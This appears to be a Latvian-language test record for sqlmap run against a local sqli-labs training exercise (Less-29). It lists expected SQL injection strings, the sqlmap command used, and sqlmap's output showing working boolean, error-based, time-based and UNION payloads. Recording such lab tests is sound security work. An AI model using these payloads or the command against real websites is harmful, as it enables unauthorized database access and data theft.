=================================================================================
1. Īpašība: piemēra sqli-labs11 variācija - kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1' or 1=1-- -
3.2. error-based: ?id=-1%27
3.3. time-based: ?id=-1' or sleep(1)-- -
3.4. union: ?id=-1' union select 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 2874422 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-29/?id=1" -p id -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 66 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8025=8025-- LwJR

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x717a6a6271,(SELECT (ELT(1324=1324,1))),0x716a787171),1324)-- SAST

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7592 FROM (SELECT(SLEEP(5)))IdSC)-- AbbK

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6500' UNION ALL SELECT NULL,CONCAT(0x717a6a6271,0x4f504356464e7a696a474d4e455a78556d7975536d766d6c666f677a656a796f794d4a786157486a,0x716a787171),NULL-- -
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
